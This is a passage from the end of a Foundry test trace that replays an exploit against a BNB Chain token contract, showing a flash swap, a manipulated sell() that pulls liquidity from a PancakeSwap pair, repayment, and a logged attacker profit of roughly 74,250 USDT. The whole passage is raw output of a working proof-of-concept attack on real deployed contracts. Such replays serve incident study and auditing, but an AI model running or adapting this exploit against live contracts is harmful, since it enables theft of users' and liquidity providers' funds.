    │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x051d6a5f987e4fc53B458eC4f88A104356E6995a) [staticcall]
    │   │   │   │   └─ ← [Return] 181553227846560717220996778 [1.815e26]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [115354] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::sell(75500000000000000000000000 [7.55e25])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 75500000000000000000000000 [7.55e25])
    │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   └─ ← [Return] 75760820579536441256403765 [7.576e25]
    │   │   │   ├─ [439] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 12240015757766824861408624 [1.224e25]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5ABDe8B434133C98c36F4B21476791D95D888bF5) [staticcall]
    │   │   │   │   └─ ← [Return] 10920 [1.092e4]
    │   │   │   ├─ [85360] 0x10ED43C718714eb63d5aA57B78B54704E256024E::removeLiquidity(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x55d398326f99059fF775485246999027B3197955, 12197877248982797510354403 [1.219e25], 67950000000000000000000000 [6.795e25], 0, 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 1683045919 [1.683e9])
    │   │   │   │   ├─ [27476] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::transferFrom(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, 12197877248982797510354403 [1.219e25])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, value: 12197877248982797510354403 [1.219e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0 → 0x0000000000000000000000000000000000000000000a1700402aca654f7da5e3
    │   │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x0000000000000000000000000000000000000000000a1fa2d5fd8e0f640017d3 → 0x0000000000000000000000000000000000000000000008a295d2c3aa148271f0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [55497] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::burn(0x5ABDe8B434133C98c36F4B21476791D95D888bF5)
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1982749131999675869539950 [1.982e24]
    │   │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 75760820579536441256403765 [7.576e25]
    │   │   │   │   │   ├─ [354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 3526719319218903323292 [3.526e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, to: 0x0000000000000000000000000000000000000000, value: 12197877248982797510354403 [1.219e25])
    │   │   │   │   │   ├─ [6071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 1975353993578444384134829 [1.975e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 1975353993578444384134829 [1.975e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0x00000000000000000000000000000000000000000001a3dd0bbae293d8ffae6e → 0x000000000000000000000000000000000000000000000190e4296cfcc9bb47c1
    │   │   │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 10920 → 0x00000000000000000000000000000000000000000001a24c279175970f449155
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [4772] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::transfer(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 75478252429058064682693305 [7.547e25])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 75478252429058064682693305 [7.547e25])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x733e043babeda38acb227cbd1f318e7f86f2f49a264ee6218338712c2add1219: 0x00000000000000000000000000000000000000014159848e5fec6542ea3ff450 → 0x00000000000000000000000000000000000000014197f3b2a33d1138e7dda709
    │   │   │   │   │   │   │   @ 0xcad15fe616505733dc9fd5d5a4d58939440cf900b48ccec5945e26778d07fc19: 0x0000000000000000000000000000000000000000003eaafa502611d1e5cb6335 → 0x000000000000000000000000000000000000000000003bd60cd565dbe82db07c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 7395138421231485405121 [7.395e21]
    │   │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 282568150478376573710460 [2.825e23]
    │   │   │   │   │   ├─ emit Sync(reserve0: 7395138421231485405121 [7.395e21], reserve1: 282568150478376573710460 [2.825e23])
    │   │   │   │   │   ├─ emit Burn(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 1975353993578444384134829 [1.975e24], amount1: 75478252429058064682693305 [7.547e25], to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x64513e1f0000003eaafa502611d1e5cb633500000001a3dd0bbae293d8ffae6e → 0x64513e1f000000003bd60cd565dbe82db07c000000000190e4296cfcc9bb47c1
    │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000049bf75cc053f4c81b5 → 0x000000000000000000000000000000000000000000000108ee85c37d857c9451
    │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000a1fec95735a14a34c9d70 → 0x0000000000000000000000000000000000000000000009ab8458872799ff0a29
    │   │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0x0000000000000000000000000000000000000000000a1700402aca654f7da5e3 → 0
    │   │   │   │   │   │   @ 11: 0x000000000000000000000066989b1578237e20f60188386360a23a4b5dda746a → 0x000000000000000000000000005db3c85f9ea7c571a21375745a4b2ffcf8717c
    │   │   │   │   │   └─ ← [Return] 1975353993578444384134829 [1.975e24], 75478252429058064682693305 [7.547e25]
    │   │   │   │   └─ ← [Return] 75478252429058064682693305 [7.547e25], 1975353993578444384134829 [1.975e24]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5ABDe8B434133C98c36F4B21476791D95D888bF5) [staticcall]
    │   │   │   │   └─ ← [Return] 1975353993578444384145749 [1.975e24]
    │   │   │   ├─ [6071] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1679050894541677726514604 [1.679e24])
    │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1679050894541677726514604 [1.679e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x00000000000000000000000000000000000000000001a24c279175970f449155 → 0x000000000000000000000000000000000000000000003ebe9f8904d6a8b0d3a9
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x00000000000000000000000000000000000000000001638d882bf7b2d654bdac
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x712f6993F8E1A3DE6ACF2f4adF8Ab102748edc88, 296303099036766657620224 [2.963e23])
    │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x712f6993F8E1A3DE6ACF2f4adF8Ab102748edc88, value: 296303099036766657620224 [2.963e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x000000000000000000000000000000000000000000003ebe9f8904d6a8b0d3a9 → 10921
    │   │   │   │   │   @ 0x7fd8802c3f8d44c7d8dc7c43d09d5f1eefeb5657332dfd118e971199f046dae8: 0x0000000000000000000000000000000000000000000001be8a1cbaa7fa9391b0 → 0x00000000000000000000000000000000000000000000407d29a5bf7ea3443ab0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit SellNF(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 75500000000000000000000000 [7.55e25], param2: 1975353993578444384134829 [1.975e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000042218d295bfbc6b4b77054 → 0x00000000000000000000000000000000000000000003adcdf5de8bb1b9377054
    │   │   │   │   @ 0x733e043babeda38acb227cbd1f318e7f86f2f49a264ee6218338712c2add1219: 0x0000000000000000000000000000000000000001411b10cf2c6ef52deebff450 → 0x00000000000000000000000000000000000000014159848e5fec6542ea3ff450
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0x7fd8802c3f8d44c7d8dc7c43d09d5f1eefeb5657332dfd118e971199f046dae8: 0x0000000000000000000000000000000000000000000001be8a1cbaa7fa9391b0 → 0x00000000000000000000000000000000000000000000407d29a5bf7ea3443ab0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x00000000000000000000000000000000000000000001638d882bf7b2d654bdac
    │   │   │   └─ ← [Return] 1679050894541677726514604 [1.679e24]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, 1604800010030000000000000 [1.604e24])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, value: 1604800010030000000000000 [1.604e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000001638d882bf7b2d654bdac → 0x000000000000000000000000000000000000000000000fb926289845803bddac
    │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000003cad594242a137f7c3bd84 → 0x0000000000000000000000000000000000000000003e012da44600a54ddc9d84
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 74250894511677726514604 [7.425e22]
    │   │   ├─ emit log_named_decimal_uint(key: "[After Attacks]  Attacker usdt balance", val: 74250894511677726514604 [7.425e22], decimals: 18)
    │   │   ├─  storage changes:
    │   │   │   @ 0x7fd8802c3f8d44c7d8dc7c43d09d5f1eefeb5657332dfd118e971199f046dae8: 0x00000000000000000000000000000000000000000000000cdbcf4c79059391b0 → 0x00000000000000000000000000000000000000000000407d29a5bf7ea3443ab0
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000003cad594242a137f7c3bd84 → 0x0000000000000000000000000000000000000000003e012da44600a54ddc9d84
    │   │   │   @ 0xb29064e4ba2f5b83cc12aeda110cbee20d821de5528ad7a1771efab6782233d7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 74958965123222575972654468 [7.495e25]
    │   ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 74784099932425533361543436 [7.478e25]
    │   ├─ emit Sync(reserve0: 74958965123222575972654468 [7.495e25], reserve1: 74784099932425533361543436 [7.478e25])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 1604800010030000000000000 [1.604e24], amount1In: 0, amount0Out: 1600000000000000000000000 [1.6e24], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x64513e1f0000003ddc262e42b6392730d90c0000003e00296ec0b5e75fc3bd84 → 0x64513e1f0000003ddc262e42b6392730d90c0000003e012da44600a54ddc9d84
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 18.60s (16.44s CPU time)

Ran 2 test suites in 19.47s (19.29s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
